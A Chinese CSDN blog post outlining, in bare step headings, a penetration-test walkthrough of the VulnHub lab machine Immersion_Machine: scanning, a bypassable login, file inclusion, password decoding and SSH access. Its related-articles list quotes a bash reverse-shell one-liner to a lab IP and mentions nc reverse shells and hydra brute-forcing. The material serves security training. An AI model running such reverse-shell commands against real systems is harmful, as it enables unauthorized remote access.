vulnhub靶机Immersion_Machine

最新推荐文章于 2024-08-23 17:00:00 发布
最新推荐文章于 2024-08-23 17:00:00 发布
阅读量421 收藏 10
点赞数 7
分类专栏: vulnhub 文章标签: web安全 数据库 网络攻击模型 sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73248913/article/details/135816593
版权
本文描述了一次对Immersion_Machine.ova文件的网络安全评估过程,包括主机发现、端口和服务扫描,发现登录漏洞并通过解码获取密码,最终实现SSH登录。作者还分享了部分攻击步骤的bash脚本实现。
摘要由CSDN通过智能技术生成

下载地址:https://download.vulnhub.com/colddworld/Immersion_Machine.ova

主机发现

目标171

端口扫描

服务扫描

漏洞扫描

看一下web

目录扫描

一个个去看一下

一定是先看login

/var/ carls.txt是有密码的

login这个随便输入都能进去

文件包含应该是

先测试变量名

因该是这个

访问

ssh登入

密码错误,是要解码了

登入成功

emmm改写成bash

结束

himobrinehacken
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机gigachad_vh
m0_73248913的博客
11-28 440
vulnhub靶机
Vulnhub靶机:Kioptrix_Level1
qq_48904485的博客
03-12 941
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机Infosec_Warrior1渗透
xingjinhao123的博客
03-07 382
靶机介绍 官方下载地址: http://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/ 靶机难度:容易 运行环境 靶机:网络设为NAT模式,IP地址:192.168.174.141 攻击机:同网段下的kali linux,IP地址:192.168.174.135 开始渗透: 运行靶机 获取靶机地址 扫描端口,只有两个端口22端口是ssh服务的80端口是apache2服务的 扫描目录 web首页是apache服务的 sitemap.xml
VulnHub靶机-easy_cloudantivirus 打靶
rumil的博客
04-12 846
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1305
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
Vulnhub靶机no_name渗透
xingjinhao123的博客
03-06 390
靶机介绍 官方下载地址:http://www.vulnhub.com/entry/haclabs-no_name,429/ 靶机获取shell比较难,提权比较容易,一共有三个flag在用户的家目录里面,需要在virtualbox运行,网络设为桥接 运行环境 靶机:网络设为桥接,IP地址:192.168.1.91 攻击机:同网段下的kali linux,IP地址:192.168.1.37 开始渗透 运行靶机 获取靶机IP地址 扫描端口及其服务 看到只开放了一个80端口,扫一下目录 开始访问得到的目
Vulnhub靶机Bob_v1.0.1 writeup
xingjinhao123的博客
02-18 2999
下载地址:https://www.vulnhub.com/entry/bob-101,226/ 信息搜集 扫描IP地址 扫描端口及端口信息 访问80端口并没有发现有用的信息 扫描目录 看到有熟悉的robots.txt,访问看一下 发现了dev_shell.php,可以执行一些简单的命令,但是不能执行ls,ifconfig,pwd等命令 getshell bash反弹shell bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 &
Vulnhub靶机:BOREDHACKERBLOG_ CLOUD AV
LainWith的博客
06-18 1250
系列:BoredHackerBlog(此系列共4台) 发布日期:2020年03月29日 难度:初级-中级 靶机地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 内容简介: 这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:netdiscover主机发现 对于VulnHub靶机来说,出现“PCS Systemtech
vulnhub 靶机web-machine
qq_44029310的博客
06-12 303
一次打靶练习记录。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
网络安全(黑客)——自学2024
2401_84466325的博客
08-21 1508
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
08-18 1601
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
2024年入职/转行网络安全,该如何规划?_网络安全职业规划
2401_85023531的博客
08-23 816
前段时间,知名机构麦可思研究院发布了《2022年中国本科生就业报告》,其中详细列出近五年的本科绿牌专业,其中,信息安全位列第一。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
08-23 1111
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

himobrinehacken

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值